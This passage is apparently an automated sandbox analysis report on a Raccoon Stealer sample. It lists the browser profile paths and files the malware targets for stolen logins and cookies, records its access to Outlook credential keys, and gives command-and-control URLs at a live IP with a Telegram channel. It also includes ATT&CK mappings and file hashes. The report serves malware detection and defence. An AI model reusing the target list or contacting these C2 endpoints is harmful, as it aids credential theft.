Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Mustang
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	OS Credential Dumping2	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Application Shimming1	Application Shimming1	Obfuscated Files or Information2	Credential API Hooking1	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection11	Timestomp1	Input Capture1	File and Directory Discovery2	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	Credentials In Files1	System Information Discovery126	Distributed Component Object Model	Credential API Hooking1	Scheduled Transfer	Application Layer Protocol15	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery211	SSH	Input Capture1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion1	DCSync	Process Discovery11	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection11	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
eLZzxG56uH.exe	24%	Virustotal		Browse
eLZzxG56uH.exe	22%	ReversingLabs	Win32.Infostealer.Racealer
eLZzxG56uH.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.1.eLZzxG56uH.exe.1c0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.eLZzxG56uH.exe.1c0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.eLZzxG56uH.exe.1c0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://185.138.164.150:80//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6fiimedpic	0%	Avira URL Cloud	safe
http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f.te	0%	Avira URL Cloud	safe
http://crl.securetrust.com/SGCA.crl0	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl0	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
http://185.138.164.150/w	0%	Avira URL Cloud	safe
http://185.138.164.150/~	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f	0%	Avira URL Cloud	safe
http://ocsp.accv.es0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://185.138.164.150/	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel05	0%	URL Reputation	safe
http://www.quovadis.bm0	0%	URL Reputation	safe
http://185.138.164.150:80/F2FB95FBD9F1696ome	0%	Avira URL Cloud	safe
http://www.accv.es00	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy-G20	0%	URL Reputation	safe
http://185.138.164.150/D	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f	true	Avira URL Cloud: safe	unknown
http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9	true	Avira URL Cloud: safe	unknown
http://185.138.164.150/	true	Avira URL Cloud: safe	unknown
https://t.me/tika31ramencomp	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	false		high
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	false		high
http://crl.chambersign.org/chambersroot.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/favicons/favicon-16x16.p	eLZzxG56uH.exe, 00000000.00000003.311406485.000000004C73A000.00000004.00000001.sdmp	false		high
https://repository.luxtrust.lu0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://support.google.com/chrome/answer/6258784	eLZzxG56uH.exe, 00000000.00000003.302859980.0000000001746000.00000004.00000001.sdmp	false		high
http://cps.chambersign.org/cps/chambersroot.html0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://telegram.org/img/t_logo.png	eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	false		high
http://www.mozilla.com0	qipcap.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	eLZzxG56uH.exe, 00000000.00000003.311406485.000000004C73A000.00000004.00000001.sdmp	false		high
http://www.chambersign.org1	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	eLZzxG56uH.exe, 00000000.00000003.302859980.0000000001746000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.firmaprofesional.com/cps0	nssckbi.dll.0.dr	false		high
http://www.diginotar.nl/cps/pkioverheid0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://repository.swisssign.com/0	nssckbi.dll.0.dr	false		high
http://185.138.164.150:80//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6fiimedpic	eLZzxG56uH.exe, 00000000.00000002.314379264.0000000001758000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f.te	eLZzxG56uH.exe, 00000000.00000003.311477945.0000000001738000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.securetrust.com/SGCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://crl.securetrust.com/STCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	qipcap.dll.0.dr	false		high
http://www.certplus.com/CRL/class2.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.quovadisglobal.com/cps0	nssckbi.dll.0.dr	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	nssckbi.dll.0.dr	false		high
http://185.138.164.150/w	eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://185.138.164.150/~	eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0	eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	false		high
https://ocsp.quovadisoffshore.com0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://cps.chambersign.org/cps/chambersignroot.html0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	sqlite3.dll.0.dr	false		high
http://policy.camerfirma.com0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	false		high
http://www.accv.es/legislacion_c.htm0U	nssckbi.dll.0.dr	false		high
http://www.certicamara.com/dpc/0Z	nssckbi.dll.0.dr	false		high
http://ocsp.accv.es0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://ocsp.thawte.com0	qipcap.dll.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	false		high
https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0	eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	false		high
https://www.catcert.net/verarrel	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	nssckbi.dll.0.dr	false		high
http://crl.chambersign.org/chambersignroot.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://www.catcert.net/verarrel05	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.quovadis.bm0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://185.138.164.150:80/F2FB95FBD9F1696ome	eLZzxG56uH.exe, 00000000.00000002.314379264.0000000001758000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.accv.es00	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.pkioverheid.nl/policies/root-policy-G20	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.cert.fnmt.es/dpcs/0	nssckbi.dll.0.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	false		high
http://185.138.164.150/D	eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.138.164.150	unknown	Germany		50451	DEPTELECOMNSO-ASRU	true
149.154.167.99	t.me	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491991
Start date:	28.09.2021
Start time:	08:52:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	eLZzxG56uH.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/68@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.6% (good quality ratio 3.5%) Quality average: 76.2% Quality standard deviation: 20.9%
HCA Information:	Successful, ratio: 56% Number of executed functions: 73 Number of non-executed functions: 107
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.50.102.62, 80.67.82.211, 80.67.82.235, 20.54.110.249, 40.112.88.60, 173.222.108.210, 173.222.108.226, 20.199.120.85, 20.199.120.151, 20.82.210.154 Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:53:33	API Interceptor	5x Sleep call for process: eLZzxG56uH.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.138.164.150	SKM_C258.EXE	Get hash	malicious	Browse	185.138.164.150/
	CPHB7Z2buG.exe	Get hash	malicious	Browse	185.138.164.150/
	aylGgMNibQ.exe	Get hash	malicious	Browse	185.138.164.150//l/f/3ZHhKnwB3dP17SpzFajb/5b91741cbd3b3ceb520ded6d675580fb0bce51b2
	V3fm0d84mp.exe	Get hash	malicious	Browse	185.138.164.150/
	Aqlmlmmeey.exe	Get hash	malicious	Browse	185.138.164.150/
	6lGJNtdKHt.exe	Get hash	malicious	Browse	185.138.164.150/
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse	185.138.164.150/
	75fcGkVO1k.exe	Get hash	malicious	Browse	185.138.164.150/
	8aAG42oIjb.exe	Get hash	malicious	Browse	185.138.164.150/
	jUV82t8dgh.exe	Get hash	malicious	Browse	185.138.164.150/
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	185.138.164.150/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
t.me	SKM_C258.EXE	Get hash	malicious	Browse	149.154.167.99
	CPHB7Z2buG.exe	Get hash	malicious	Browse	149.154.167.99
	aylGgMNibQ.exe	Get hash	malicious	Browse	149.154.167.99
	V3fm0d84mp.exe	Get hash	malicious	Browse	149.154.167.99
	Aqlmlmmeey.exe	Get hash	malicious	Browse	149.154.167.99
	6lGJNtdKHt.exe	Get hash	malicious	Browse	149.154.167.99
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse	149.154.167.99
	xx2wsaL3cJ.exe	Get hash	malicious	Browse	149.154.167.99
	75fcGkVO1k.exe	Get hash	malicious	Browse	149.154.167.99
	8aAG42oIjb.exe	Get hash	malicious	Browse	149.154.167.99
	Zq0u07ZGkg.exe	Get hash	malicious	Browse	149.154.167.99
	jUV82t8dgh.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	149.154.167.99
	31cGYywxgy.exe	Get hash	malicious	Browse	149.154.167.99
	pAWNholT8X.exe	Get hash	malicious	Browse	149.154.167.99
	OARirszNK2.exe	Get hash	malicious	Browse	149.154.167.99
	rbQe356Ces.exe	Get hash	malicious	Browse	149.154.167.99
	kzSWxYLY4H.exe	Get hash	malicious	Browse	149.154.167.99
	nrR5LZJupm.exe	Get hash	malicious	Browse	149.154.167.99
	Neue Bestellung 09001.exe	Get hash	malicious	Browse	149.154.167.99

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DEPTELECOMNSO-ASRU	SKM_C258.EXE	Get hash	malicious	Browse	185.138.164.150
	CPHB7Z2buG.exe	Get hash	malicious	Browse	185.138.164.150
	aylGgMNibQ.exe	Get hash	malicious	Browse	185.138.164.150
	V3fm0d84mp.exe	Get hash	malicious	Browse	185.138.164.150
	Aqlmlmmeey.exe	Get hash	malicious	Browse	185.138.164.150
	6lGJNtdKHt.exe	Get hash	malicious	Browse	185.138.164.150
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse	185.138.164.150
	xx2wsaL3cJ.exe	Get hash	malicious	Browse	185.138.164.150
	75fcGkVO1k.exe	Get hash	malicious	Browse	185.138.164.150
	8aAG42oIjb.exe	Get hash	malicious	Browse	185.138.164.150
	Zq0u07ZGkg.exe	Get hash	malicious	Browse	185.138.164.150
	jUV82t8dgh.exe	Get hash	malicious	Browse	185.138.164.150
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	185.138.164.150
	art185.exe	Get hash	malicious	Browse	185.138.164.157
	art185.exe	Get hash	malicious	Browse	185.138.164.157
	R2u2hrX28Z.exe	Get hash	malicious	Browse	185.138.164.60

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	SKM_C258.EXE	Get hash	malicious	Browse	149.154.167.99
	CPHB7Z2buG.exe	Get hash	malicious	Browse	149.154.167.99
	aylGgMNibQ.exe	Get hash	malicious	Browse	149.154.167.99
	V3fm0d84mp.exe	Get hash	malicious	Browse	149.154.167.99
	Aqlmlmmeey.exe	Get hash	malicious	Browse	149.154.167.99
	6lGJNtdKHt.exe	Get hash	malicious	Browse	149.154.167.99
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse	149.154.167.99
	75fcGkVO1k.exe	Get hash	malicious	Browse	149.154.167.99
	8aAG42oIjb.exe	Get hash	malicious	Browse	149.154.167.99
	V-21-Kiel-050-D02.docx	Get hash	malicious	Browse	149.154.167.99
	jUV82t8dgh.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	149.154.167.99
	31cGYywxgy.exe	Get hash	malicious	Browse	149.154.167.99
	pAWNholT8X.exe	Get hash	malicious	Browse	149.154.167.99
	OARirszNK2.exe	Get hash	malicious	Browse	149.154.167.99
	Neue Bestellung 09001.exe	Get hash	malicious	Browse	149.154.167.99
	u8NGCuPdOR.exe	Get hash	malicious	Browse	149.154.167.99
	tNOprA6TKc.exe	Get hash	malicious	Browse	149.154.167.99
	gow3TOp9TW.exe	Get hash	malicious	Browse	149.154.167.99
	TDxZ3sbsqi.exe	Get hash	malicious	Browse	149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\LocalLow\sqlite3.dll	SKM_C258.EXE	Get hash	malicious	Browse
	Aqlmlmmeey.exe	Get hash	malicious	Browse
	6lGJNtdKHt.exe	Get hash	malicious	Browse
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse
	xx2wsaL3cJ.exe	Get hash	malicious	Browse
	75fcGkVO1k.exe	Get hash	malicious	Browse
	8aAG42oIjb.exe	Get hash	malicious	Browse
	Zq0u07ZGkg.exe	Get hash	malicious	Browse
	jUV82t8dgh.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse
	OARirszNK2.exe	Get hash	malicious	Browse
	rbQe356Ces.exe	Get hash	malicious	Browse
	Neue Bestellung 09001.exe	Get hash	malicious	Browse
	OTKqvzSZfm.exe	Get hash	malicious	Browse
	u8NGCuPdOR.exe	Get hash	malicious	Browse
	e5jVcbuCo5.exe	Get hash	malicious	Browse
	729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exe	Get hash	malicious	Browse
	iQjdq8GOib.exe	Get hash	malicious	Browse
	aRJ7tjHVOF.exe	Get hash	malicious	Browse
	4o99bctKos.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\1xVPfvJcrg Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\RYwTiizs2t Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
